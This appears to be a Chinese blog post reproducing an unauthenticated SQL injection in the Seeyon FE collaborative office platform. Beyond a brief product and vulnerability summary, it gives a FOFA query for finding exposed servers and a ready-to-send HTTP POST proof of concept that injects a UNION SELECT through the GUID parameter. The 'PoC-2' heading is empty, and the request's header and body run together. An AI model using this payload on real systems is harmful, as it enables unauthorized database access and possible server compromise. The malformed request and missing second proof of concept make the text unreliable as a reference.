本文主要是介绍致远互联FE协作办公平台 SQL注入漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
0x01 产品简介
致远互联FE协作办公平台是一款为企业提供全方位协同办公解决方案的产品。它集成了多个功能模块,旨在帮助企业实现高效的团队协作、信息共享和文档管理。
0x02 漏洞概述
致远互联FE协作办公平台 editflow_manager.js、validate.jsp等接口处存在SQL注入漏洞,未经身份验证的攻击者可以通过此漏洞获取数据库敏感信息,深入利用可获取服务器权限。
0x03 影响范围
FE协作办公平台 <= 6.6.0
0x04 复现环境
FOFA:app="致远互联-FE"
0x05 漏洞复现
PoC-1
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0
Connection: close
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencodedoption=2&GUID=-1%27+union+select+%40%40version--+查询数据库版本
PoC-2
这篇关于致远互联FE协作办公平台 SQL注入漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
